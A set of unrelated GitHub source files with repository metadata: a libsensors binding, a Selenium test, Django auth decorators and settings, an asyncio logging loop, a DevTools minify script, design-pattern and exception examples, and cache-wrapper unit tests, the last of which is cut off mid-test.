_parse_chip_name.argtypes = [c_char_p, CHIP_P]
_parse_chip_name.restype = c_int
_parse_chip_name.errcheck = _error_check
_free_chip_name = SENSORS_LIB.sensors_free_chip_name
_free_chip_name.argtypes = [CHIP_P]
_free_chip_name.restype = None
_snprintf_chip_name = SENSORS_LIB.sensors_snprintf_chip_name
_snprintf_chip_name.argtypes = [c_char_p, c_size_t, CHIP_P]
_snprintf_chip_name.restype = c_int
_snprintf_chip_name.errcheck = _error_check
_get_adapter_name = SENSORS_LIB.sensors_get_adapter_name
_get_adapter_name.argtypes = [BUS_P]
_get_adapter_name.restype = c_char_p
_get_label = SENSORS_LIB.sensors_get_label
_get_label.argtypes = [CHIP_P, FEATURE_P]
_get_label.restype = c_char_p
_get_value = SENSORS_LIB.sensors_get_value
_get_value.argtypes = [CHIP_P, c_int, POINTER(c_double)]
_get_value.restype = c_int
_get_value.errcheck = _error_check
#
# TODO sensors_set_value()
# TODO sensors_do_chip_sets()
#
_get_detected_chips = SENSORS_LIB.sensors_get_detected_chips
_get_detected_chips.argtypes = [CHIP_P, POINTER(c_int)]
_get_detected_chips.restype = CHIP_P
_get_features = SENSORS_LIB.sensors_get_features
_get_features.argtypes = [CHIP_P, POINTER(c_int)]
_get_features.restype = FEATURE_P
_get_all_subfeatures = SENSORS_LIB.sensors_get_all_subfeatures
_get_all_subfeatures.argtypes = [CHIP_P, FEATURE_P, POINTER(c_int)]
_get_all_subfeatures.restype = SUBFEATURE_P
#
# TODO sensors_get_subfeature() ?
#
def iter_detected_chips(chip_name='*-*'):
chip = Chip(chip_name)
number = c_int(0)
while True:
result = _get_detected_chips(byref(chip), byref(number))
if not result:
break
yield result.contents
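# Hedged usage sketch (not part of the original binding): enumerate the
# detected chips and print every feature value, using only the API
# defined above. The function name "_print_all_sensors" is hypothetical.
def _print_all_sensors():
    init()  # falls back to DEFAULT_CONFIG_FILENAME
    try:
        for chip in iter_detected_chips():
            print('%s (on %s)' % (chip, chip.adapter_name))
            for feature in chip:
                print('  %s: %s' % (feature.label, feature.get_value()))
    finally:
        cleanup()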
|
{
"content_hash": "7271073b3abd0a750e46e77adcd3f759",
"timestamp": "",
"source": "github",
"line_count": 310,
"max_line_length": 99,
"avg_line_length": 26.296774193548387,
"alnum_prop": 0.5789990186457311,
"repo_name": "psistats/linux-client",
"id": "90c27b2903fa4997be8f9483adfff7bc898816a7",
"size": "8525",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "psistats/libsensors/lib/sensors.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "178"
},
{
"name": "Python",
"bytes": "70611"
},
{
"name": "Shell",
"bytes": "1529"
}
],
"symlink_target": ""
}
|
import sys
import os
test_root = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
slideatlas_root = os.path.abspath(os.path.join(test_root, ".."))
sys.path.append(test_root)
sys.path.append(slideatlas_root)
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
import unittest
from comparetools import sameimage
from time import sleep
BASE_URL = "http://new.slide-atlas.org"
class DemoTests(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.mouse = webdriver.ActionChains(self.driver)
# self.driver = webdriver.Firefox()
self.driver.set_window_size(1000, 1000)
# self.driver.maximize_window()
# self.driver.implicitly_wait(1)
self.base_url = BASE_URL
        self.verificationErrors = []
        self.accept_next_alert = True  # consumed by close_alert_and_get_its_text()
def open_melanoma(self):
driver = self.driver
driver.get(BASE_URL + "/logout")
# self.driver.maximize_window()
self.driver.execute_script("window.resizeTo(1100,1100);")
sleep(2)
driver.find_element_by_link_text("Home").click()
self.driver.implicitly_wait(1)
driver.find_element_by_link_text("Login").click()
self.driver.implicitly_wait(1)
driver.find_element_by_id("email").clear()
self.driver.implicitly_wait(1)
driver.find_element_by_id("email").send_keys("all_demo")
self.driver.implicitly_wait(1)
driver.find_element_by_id("submit").click()
self.driver.implicitly_wait(1)
driver.find_element_by_link_text("Sessions").click()
self.driver.implicitly_wait(1)
driver.find_element_by_link_text("Skin").click()
self.driver.implicitly_wait(1)
driver.find_element_by_link_text("4815 - 2010-10-06 16.32.21.ndpi").click()
sleep(3)
def test_navigation(self):
"""
Following snippet is useful in deciding the test_navigation
document.onmousemove = function(e){
var x = e.pageX;
var y = e.pageY;
e.target.title = "X is "+x+" and Y is "+y;
};
"""
driver = self.driver
self.open_melanoma()
canvas = self.driver.find_element_by_tag_name("canvas")
# Define zoomin and zoomout
pan = webdriver.ActionChains(driver)
pan.move_to_element_with_offset(canvas, 500,500)
pan.click_and_hold()
pan.move_to_element_with_offset(canvas, 600,500)
pan.release()
zoomin = webdriver.ActionChains(driver)
zoomin.click()
zoomin.click()
zoomout = webdriver.ActionChains(driver)
zoomout.context_click()
zoomout.context_click()
zoomout.perform()
sleep(1)
zoomout.perform()
sleep(1)
pan.perform()
sleep(1)
zoomin.perform()
sleep(1)
zoomin.perform()
sleep(1)
zoomin.perform()
sleep(1)
averagefunc = "return (function () { var total = 0; for(var i = 0; i < TILESTATS.tiles.length; i ++) { total = total + TILESTATS.tiles[i].loadtime; } return total / TILESTATS.tiles.length;})();"
stats = driver.execute_script(averagefunc)
print "Average tile load time: ", stats
def test_glviewer_in_demo(self):
driver = self.driver
self.open_melanoma()
sleep(2)
driver.save_screenshot('demo_glview.png')
# print "<DartMeasurementFile name=\"glview_demo\" type=\"image/png\"> demo_glview.png </DartMeasurementFile>"
        self.assertTrue(sameimage("demo_glview.png", os.path.join(test_root, "imgs/demo_glview.png")), "Images not same, look at the difference score")
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
        except NoSuchElementException: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert.text
finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "370750eb6cc821b6c188c37f586c1fcc",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 202,
"avg_line_length": 33.074074074074076,
"alnum_prop": 0.6161254199328108,
"repo_name": "SlideAtlas/SlideAtlas-Server",
"id": "9e9fa61274cb26e6a4371228c7915c8db65de6a9",
"size": "4465",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testing/regression/test_on_demodb.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "3869"
},
{
"name": "CSS",
"bytes": "80540"
},
{
"name": "HTML",
"bytes": "191521"
},
{
"name": "JavaScript",
"bytes": "2008727"
},
{
"name": "Jupyter Notebook",
"bytes": "4818"
},
{
"name": "Python",
"bytes": "548349"
},
{
"name": "Shell",
"bytes": "6978"
}
],
"symlink_target": ""
}
|
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.http import HttpResponseRedirect
from urllib import quote
def user_passes_test(test_func, login_url=None):
"""
Decorator for views that checks that the user passes the given test,
redirecting to the log-in page if necessary. The test should be a callable
that takes the user object and returns True if the user passes.
"""
if not login_url:
from django.conf import settings
login_url = settings.LOGIN_URL
def _dec(view_func):
def _checklogin(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
return HttpResponseRedirect('%s?%s=%s' % (login_url, REDIRECT_FIELD_NAME, quote(request.get_full_path())))
_checklogin.__doc__ = view_func.__doc__
_checklogin.__dict__ = view_func.__dict__
return _checklogin
return _dec
login_required = user_passes_test(lambda u: u.is_authenticated())
login_required.__doc__ = (
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
)
def permission_required(perm, login_url=None):
"""
Decorator for views that checks whether a user has a particular permission
enabled, redirecting to the log-in page if necessary.
"""
return user_passes_test(lambda u: u.has_perm(perm), login_url=login_url)
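# Hedged usage sketch (not part of the original module); the view names
# and the permission string are hypothetical:
#
#   @login_required
#   def profile(request):
#       ...
#
#   @permission_required('polls.can_vote', login_url='/accounts/login/')
#   def vote(request):
#       ...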
|
{
"content_hash": "f13819032e5adb5d633eddb719cf3de1",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 118,
"avg_line_length": 37.282051282051285,
"alnum_prop": 0.6671251719394773,
"repo_name": "jonaustin/advisoryscan",
"id": "2fb4a6f510d645dbf94b948f1c0df123c08e0f8e",
"size": "1454",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django/django/contrib/auth/decorators.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "63725"
},
{
"name": "JavaScript",
"bytes": "159708"
},
{
"name": "Perl",
"bytes": "89271"
},
{
"name": "Python",
"bytes": "2194026"
},
{
"name": "Shell",
"bytes": "3612"
}
],
"symlink_target": ""
}
|
import asyncio
import importlib
import sys
class ServerLoop:
def __init__(self, loop, inputs, filters, outputs):
self.loop = loop
self.inputs = inputs
self.filters = filters
self.outputs = outputs
self.records_available = asyncio.Event(loop=loop)
# TODO: reload support using imp.reload()
self.input_mods = []
self.filter_mods = []
self.output_mods = []
for name, opts in self.inputs.items():
print('loading input module {}...'.format(name))
mod = importlib.import_module('..inputs.{}'.format(name), __name__)
mod.init(self.loop, opts, self.records_available)
self.input_mods.append(mod)
for name, opts in self.filters.items():
print('loading filter module {}...'.format(name))
mod = importlib.import_module('..filters.{}'.format(name), __name__)
mod.init(self.loop, opts)
self.filter_mods.append(mod)
for name, opts in self.outputs.items():
print('loading output module {}...'.format(name))
mod = importlib.import_module('..outputs.{}'.format(name), __name__)
mod.init(self.loop, opts)
self.output_mods.append(mod)
async def serve(self):
print('started.')
while True:
            # Wait until any input module notifies us.
# Via this notification scheme, we can avoid busy-waiting.
await self.records_available.wait()
self.records_available.clear()
records = []
for mod in self.input_mods:
records.extend(mod.fetch())
if records:
# TODO: apply filters
for mod in self.output_mods:
mod.enqueue(records)
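# Hedged sketch of the plug-in contract ServerLoop relies on (not part of
# the original file). An input module (inputs/<name>.py) is assumed to
# expose:
#
#   def init(loop, opts, records_available):
#       # keep a reference to records_available and call
#       # records_available.set() whenever new records arrive
#
#   def fetch():
#       # return (and clear) the records buffered since the last call
#
# Filter and output modules expose init(loop, opts); output modules also
# expose enqueue(records). The module name "<name>" is hypothetical.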
|
{
"content_hash": "9479a1f19ae00595b136c5e65f8fad99",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 80,
"avg_line_length": 36.34,
"alnum_prop": 0.5586130985140341,
"repo_name": "lablup/logger",
"id": "a3435bf13df14221270685482896543cc0b67de3",
"size": "1842",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "logger/server.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8771"
},
{
"name": "Shell",
"bytes": "705"
}
],
"symlink_target": ""
}
|
"""
Minifies the given DevTools front-end modules and copies them into the output folder.
"""
from os.path import join, relpath
import shutil
import sys
import rjsmin
from modular_build import read_file, write_file
def main(argv):
try:
input_path_flag_index = argv.index('--input_path')
input_path = argv[input_path_flag_index + 1]
output_path_flag_index = argv.index('--output_path')
output_path = argv[output_path_flag_index + 1]
devtools_modules = argv[1:input_path_flag_index]
    except (ValueError, IndexError):
print('Usage: %s module_1 module_2 ... module_N --input_path <input_path> --output_path <output_path>' % argv[0])
raise
for file_name in devtools_modules:
file_content = read_file(join(input_path, file_name))
minified = rjsmin.jsmin(file_content)
write_file(join(output_path, relpath(file_name, 'front_end')), minified)
def DoMain(argv):
if '--gen_rsp' in argv:
# Write all following args to the specified rsp file.
rsp_index = argv.index('--gen_rsp')
rsp_path = argv[rsp_index + 1]
with open(rsp_path, 'w') as rsp_file:
rsp_file.writelines("%s\n" % a for a in argv[rsp_index + 2:])
return rsp_path # Return the rsp path for GYP's <(pymod_do_main ...)
elif '--rsp' in argv:
# Replace the --rsp arg with the contents of the rsp file.
rsp_index = argv.index('--rsp')
rsp_path = argv[rsp_index + 1]
with open(rsp_path, 'r') as rsp_file:
rsp_args = [line.strip() for line in rsp_file]
return main(argv[:rsp_index] + rsp_args + argv[rsp_index + 2:])
else:
return main(argv)
if __name__ == '__main__':
sys.exit(DoMain(sys.argv))
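# Hedged illustration (not part of the original script) of the rsp
# round-trip as GYP would drive it; all paths are hypothetical.
#
#   DoMain(['--gen_rsp', 'modules.rsp', 'front_end/a.js', 'front_end/b.js',
#           '--input_path', 'src', '--output_path', 'out'])
#   # writes the trailing args to modules.rsp and returns 'modules.rsp'
#
#   DoMain(['copy_devtools_modules.py', '--rsp', 'modules.rsp'])
#   # expands modules.rsp back into argv and runs main()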
|
{
"content_hash": "0bfd537d070bac56479a48f01f89dd41",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 121,
"avg_line_length": 34.02,
"alnum_prop": 0.6072898295120517,
"repo_name": "youtube/cobalt_sandbox",
"id": "5517596786d28034b49fdc3fdd259f9abf41b71d",
"size": "1911",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "third_party/devtools/scripts/build/copy_devtools_modules.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import tasks
wait_min = 60
if __name__ == "__main__":
tasks.q_update.enqueue(tasks.update_all,wait_min)
tasks.q_new.enqueue(tasks.get_new_url)
tasks.q_retry.enqueue(tasks.retry)
#tasks.update_worker.work()
#tasks.new_worker.work()
print "Start....."
|
{
"content_hash": "5a6386d39be82a21501cf89bfc585f14",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 53,
"avg_line_length": 24,
"alnum_prop": 0.6423611111111112,
"repo_name": "seraphlnWu/in_trip",
"id": "ba6d5f015a3da8d446b9a7747bd5d2efd87763a7",
"size": "288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "in_trip/in_trip/youku/service.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "20830"
},
{
"name": "Java",
"bytes": "4625"
},
{
"name": "JavaScript",
"bytes": "76507"
},
{
"name": "Python",
"bytes": "349718"
},
{
"name": "Scheme",
"bytes": "6001"
},
{
"name": "Shell",
"bytes": "7188"
}
],
"symlink_target": ""
}
|
"""Functions for inference."""
import os
import argparse
import functools
import paddle
import paddle.fluid as fluid
import paddle.fluid.layers as layers
from lib import pose_resnet
from utils.transforms import flip_back
from utils.utility import *
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('batch_size', int, 32, "Minibatch size.")
add_arg('dataset', str, 'mpii', "Dataset")
add_arg('use_gpu', bool, True, "Whether to use GPU or not.")
add_arg('kp_dim', int, 16, "Class number.")
add_arg('model_save_dir', str, "output", "Model save directory")
add_arg('with_mem_opt', bool, True, "Whether to use memory optimization or not.")
add_arg('checkpoint', str, None, "Whether to resume checkpoint.")
add_arg('flip_test', bool, True, "Flip test")
add_arg('shift_heatmap', bool, True, "Shift heatmap")
# yapf: enable
def test(args):
import lib.mpii_reader as reader
if args.dataset == 'coco':
IMAGE_SIZE = [288, 384]
FLIP_PAIRS = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16]]
args.kp_dim = 17
elif args.dataset == 'mpii':
IMAGE_SIZE = [384, 384]
FLIP_PAIRS = [[0, 5], [1, 4], [2, 3], [10, 15], [11, 14], [12, 13]]
args.kp_dim = 16
else:
raise ValueError('The dataset {} is not supported yet.'.format(args.dataset))
print_arguments(args)
# Image and target
image = layers.data(name='image', shape=[3, IMAGE_SIZE[1], IMAGE_SIZE[0]], dtype='float32')
file_id = layers.data(name='file_id', shape=[1,], dtype='int')
# Build model
model = pose_resnet.ResNet(layers=50, kps_num=args.kp_dim, test_mode=True)
# Output
output = model.net(input=image, target=None, target_weight=None)
if args.with_mem_opt:
fluid.memory_optimize(fluid.default_main_program(),
skip_opt_set=[output.name])
place = fluid.CUDAPlace(0) if args.use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
if args.checkpoint is not None:
fluid.io.load_persistables(exe, args.checkpoint)
# Dataloader
test_reader = paddle.batch(reader.test(), batch_size=args.batch_size)
feeder = fluid.DataFeeder(place=place, feed_list=[image, file_id])
test_exe = fluid.ParallelExecutor(
use_cuda=True if args.use_gpu else False,
main_program=fluid.default_main_program().clone(for_test=True),
loss_name=None)
fetch_list = [image.name, output.name]
for batch_id, data in enumerate(test_reader()):
num_images = len(data)
file_ids = []
for i in range(num_images):
file_ids.append(data[i][1])
input_image, out_heatmaps = test_exe.run(
fetch_list=fetch_list,
feed=feeder.feed(data))
if args.flip_test:
            # Flip all the images in the same batch
data_fliped = []
for i in range(num_images):
data_fliped.append((
data[i][0][:, :, ::-1],
data[i][1]))
# Inference again
_, output_flipped = test_exe.run(
fetch_list=fetch_list,
feed=feeder.feed(data_fliped))
# Flip back
output_flipped = flip_back(output_flipped, FLIP_PAIRS)
# Feature is not aligned, shift flipped heatmap for higher accuracy
if args.shift_heatmap:
output_flipped[:, :, :, 1:] = \
output_flipped.copy()[:, :, :, 0:-1]
# Aggregate
out_heatmaps = (out_heatmaps + output_flipped) * 0.5
save_predict_results(input_image, out_heatmaps, file_ids, fold_name='results')
if __name__ == '__main__':
args = parser.parse_args()
test(args)
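# Hedged invocation example (not part of the original script); the
# checkpoint path is hypothetical, the flags are the ones registered
# above:
#
#   python test.py --dataset mpii --checkpoint output/pose-resnet-50 \
#       --batch_size 32 --use_gpu True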
|
{
"content_hash": "3a2e76bb80dfa432f4e353da7acc4cf0",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 100,
"avg_line_length": 36.219298245614034,
"alnum_prop": 0.5616372002906272,
"repo_name": "kuke/models",
"id": "aebbe517133fe589bac819dd337c03d264136cc2",
"size": "4797",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "fluid/PaddleCV/human_pose_estimation/test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "15149"
},
{
"name": "Perl",
"bytes": "2072"
},
{
"name": "Python",
"bytes": "2905007"
},
{
"name": "Shell",
"bytes": "2506531"
}
],
"symlink_target": ""
}
|
import collections
def main():
form = Form()
test_user_interaction_with(form)
class Form:
def __init__(self):
self.create_widgets()
self.create_mediator()
def create_widgets(self):
self.nameText = Text()
self.emailText = Text()
self.okButton = Button("OK")
self.cancelButton = Button("Cancel")
def create_mediator(self):
self.mediator = Mediator(((self.nameText, self.update_ui),
(self.emailText, self.update_ui),
(self.okButton, self.clicked),
(self.cancelButton, self.clicked)))
self.update_ui()
def update_ui(self, widget=None):
self.okButton.enabled = (bool(self.nameText.text) and
bool(self.emailText.text))
def clicked(self, widget):
if widget == self.okButton:
print("OK")
elif widget == self.cancelButton:
print("Cancel")
class Mediator:
def __init__(self, widgetCallablePairs):
self.callablesForWidget = collections.defaultdict(list)
for widget, caller in widgetCallablePairs:
self.callablesForWidget[widget].append(caller)
widget.mediator = self
def on_change(self, widget):
callables = self.callablesForWidget.get(widget)
if callables is not None:
for caller in callables:
caller(widget)
else:
raise AttributeError("No on_change() method registered for {}"
.format(widget))
def mediated(Class):
setattr(Class, "mediator", None)
def on_change(self):
if self.mediator is not None:
self.mediator.on_change(self)
setattr(Class, "on_change", on_change)
return Class
@mediated
class Button:
def __init__(self, text=""):
super().__init__()
self.enabled = True
self.text = text
def click(self):
if self.enabled:
self.on_change()
def __str__(self):
return "Button({!r}) {}".format(self.text,
"enabled" if self.enabled else "disabled")
@mediated
class Text:
def __init__(self, text=""):
super().__init__()
self.__text = text
@property
def text(self):
return self.__text
@text.setter
def text(self, text):
if self.text != text:
self.__text = text
self.on_change()
def __str__(self):
return "Text({!r})".format(self.text)
def test_user_interaction_with(form):
form.okButton.click() # Ignored because it is disabled
print(form.okButton.enabled) # False
form.nameText.text = "Fred"
print(form.okButton.enabled) # False
form.emailText.text = "fred@bloggers.com"
print(form.okButton.enabled) # True
form.okButton.click() # OK
form.emailText.text = ""
print(form.okButton.enabled) # False
form.cancelButton.click() # Cancel
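# Hedged extension sketch (not part of the original demo): any widget can
# join the mediation once decorated; "Checkbox" is hypothetical.
@mediated
class Checkbox:
    def __init__(self, checked=False):
        super().__init__()
        self.checked = checked
    def toggle(self):
        self.checked = not self.checked
        self.on_change()  # a no-op until a Mediator registers this widget
    def __str__(self):
        return "Checkbox({!r})".format(self.checked)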
if __name__ == "__main__":
main()
|
{
"content_hash": "308f81676a43f91a4e4c7f93ce536ce7",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 74,
"avg_line_length": 23.7421875,
"alnum_prop": 0.5656465942744324,
"repo_name": "iceihehe/pipeg",
"id": "6629bab811ff1edbdfd6033d96f4b80241a7e740",
"size": "3648",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "python3/mediator1d.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "721392"
}
],
"symlink_target": ""
}
|
"""Illustrates the problem where a finally block raises an exception. This
can mask the original exception that caused the problem in the first place.
The user sees the ExceptionCleanUp but not the ExceptionNormal which was masked
(in Python 2.x). Python 3 reports both exceptions.
Created on Aug 19, 2011
@author: paulross
"""
class ExceptionNormal(Exception):
pass
class ExceptionCleanUp(Exception):
pass
def a():
b()
def b():
try:
c()
finally:
print(' b(): finally: This code is always executed.')
cleanUp()
def c():
print('Raising "ExceptionNormal" from c()')
raise ExceptionNormal('ExceptionNormal raised from function c()')
def cleanUp():
raise ExceptionCleanUp('Can not clean up')
def main():
a()
return 0
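# Hedged mitigation sketch (not part of the original example): shielding
# the clean-up call keeps ExceptionNormal visible, at the price of hiding
# the clean-up failure.
def b_shielded():
    try:
        c()
    finally:
        try:
            cleanUp()
        except ExceptionCleanUp:
            pass  # swallow (or log) so the original exception propagates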
if __name__ == '__main__':
main()
|
{
"content_hash": "923206d747552512efa845d8c4476faf",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 79,
"avg_line_length": 20.775,
"alnum_prop": 0.6666666666666666,
"repo_name": "manahl/PythonTrainingExercises",
"id": "b4a7885783bccbec5418dd30a93f80caf7e4d796",
"size": "853",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Beginners/ExampleExceptions/C_finally_prob.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "285088"
}
],
"symlink_target": ""
}
|
"""
Django settings for emergencyTransport project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'Secret key needed'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'datetimewidget',
'bootstrap3',
'background_task',
'RouteFinder',
'CustomGeoposition',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
)
ROOT_URLCONF = 'emergencyTransport.urls'
WSGI_APPLICATION = 'emergencyTransport.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Geoposition app settings
CUSTOMGEOPOSITION_MAP_OPTIONS = {
'minZoom': 10,
'maxZoom': 15,
'center': {'lat': 51.483125, 'lng': -3.178261}
}
CUSTOMGEOPOSITION_MAP_WIDGET_HEIGHT = 240
CUSTOMGEOPOSITION_MARKER_OPTIONS = {}
CUSTOMGEOPOSITION_API_KEY = 'Get an API key from Google'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# STATIC_ROOT = '/static/'
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
# URL of the login page.
LOGIN_URL = '/login/'
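# Hedged hardening note (not part of the original settings): in production
# the literals above would typically come from the environment, e.g.
#
#   SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', SECRET_KEY)
#   CUSTOMGEOPOSITION_API_KEY = os.environ.get('GOOGLE_MAPS_API_KEY', '')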
|
{
"content_hash": "255c36f66da1824dd012b5bd77fd7ff2",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 71,
"avg_line_length": 24.276190476190475,
"alnum_prop": 0.7175362887406826,
"repo_name": "MatthewGWilliams/Staff-Transport",
"id": "06ab4c787a3bc8c3e7f58634eb5cf6a8721273e3",
"size": "2549",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "emergencyTransport/emergencyTransport/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "190554"
},
{
"name": "CSS",
"bytes": "1163"
},
{
"name": "JavaScript",
"bytes": "7015"
},
{
"name": "Python",
"bytes": "57863"
}
],
"symlink_target": ""
}
|
from . import parentpath
import unittest
from cacheman.cachewrap import CacheWrap, NonPersistentCache, PersistentCache
from .common import CacheCommonAsserter
class CacheWrapTest(CacheCommonAsserter, unittest.TestCase):
def __init__(self, *args, **kwargs):
CacheCommonAsserter.__init__(self)
unittest.TestCase.__init__(self, *args, **kwargs)
def assert_registrations_blank(self, cache, registration_names):
for reg in registration_names:
self.assertIsNone(getattr(cache, reg))
def fake_registration(self, *args, **kwargs):
return 'Some custom function'
def test_self_registering_cache(self):
for call_name in CacheWrap.CALLBACK_NAMES:
cache_name = 'foo_' + call_name
cache = CacheWrap(cache_name, cache_manager=self.manager,
**{ call_name: self.fake_registration })
registers = [reg for reg in CacheWrap.CALLBACK_NAMES if reg != call_name]
self.assert_registrations_blank(cache, registers)
callback = getattr(cache, call_name)
self.assertIsNotNone(callback)
self.assertEqual(callback(), self.fake_registration())
def test_non_persistent_cache_wrap(self):
cache_name = 'cache_wrap'
cache = NonPersistentCache(cache_name, cache_manager=self.manager, contents={})
cache['foo'] = 'bar'
self.assertEqual(cache['foo'], 'bar')
cache.save() # No-op
self.check_cache_gone(cache_name)
cache.load() # Clear
self.check_cache_gone(cache_name)
self.assertNotIn('foo', cache)
def test_persistent_cache_wrap(self):
cache_name = self.check_cache_gone('persistent')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={})
cache['foo'] = 'bar'
cache.save()
self.check_cache(cache_name, True)
cache.load() # Reload
self.check_cache(cache_name, True)
self.assertEqual(cache['foo'], 'bar')
def test_content_driven_cache_wrap(self):
cache_name = self.check_cache_gone('content')
# Pass a non-empty list as content
cache = PersistentCache(cache_name, cache_manager=self.manager, contents=[''],
builder=lambda *args: [])
cache[0] = 'foo'
cache.append('bar')
cache.save()
cache.load()
self.assertTrue(isinstance(cache, PersistentCache))
self.assertTrue(isinstance(cache.contents, list))
self.check_cache(cache_name, True)
self.assertEqual(cache[0], 'foo')
self.assertEqual(cache[1], 'bar')
cache.invalidate_and_rebuild()
self.assertTrue(isinstance(cache, PersistentCache))
self.assertTrue(isinstance(cache.contents, list))
self.assert_contents_equal(cache, [])
def test_load_on_init(self):
cache_name = self.check_cache_gone('load_init')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' })
cache.save()
cache = PersistentCache(cache_name, cache_manager=self.manager)
self.assertEqual(cache['foo'], 'bar')
def test_build_on_init(self):
cache_name = self.check_cache_gone('built')
cache = NonPersistentCache(cache_name, cache_manager=self.manager, loader=None,
builder=lambda *args: [])
self.assertTrue(isinstance(cache.contents, list))
self.assert_contents_equal(cache, [])
def test_delete_save(self):
cache_name = self.check_cache_gone('deleted')
cache = PersistentCache(cache_name, cache_manager=self.manager)
cache['foo'] = 'bar'
cache.__del__() # To avoid lazy deletion calls/reference counts
self.check_cache(cache_name, True)
cache = PersistentCache(cache_name, cache_manager=self.manager)
self.assertEqual(cache['foo'], 'bar')
def test_scoped_cache(self):
cache_name = self.check_cache_gone('scoped')
with PersistentCache(cache_name, cache_manager=self.manager) as cache:
cache['foo'] = 'bar'
self.check_cache(cache_name, True)
# Should have saved contents in last scoping
with PersistentCache(cache_name, cache_manager=self.manager) as cache:
self.assertEqual(cache['foo'], 'bar')
def test_contains(self):
cache_name = self.check_cache_gone('contains')
cache = NonPersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' })
self.assertTrue('foo' in cache)
self.assertFalse('foo2' in cache)
def test_save_and_load(self):
cache_name = self.check_cache_gone('save_load')
cache = PersistentCache(cache_name, cache_manager=self.manager)
cache['foo'] = 'bar'
cache.save()
cache.contents = {}
self.assert_contents_equal(cache, {})
cache.load()
self.assertEqual(cache['foo'], 'bar')
def test_invalidate(self):
cache_name = self.check_cache_gone('invalidate')
cache = PersistentCache(cache_name, cache_manager=self.manager)
cache['foo'] = 'bar'
cache.save()
cache['baz'] = 'bar'
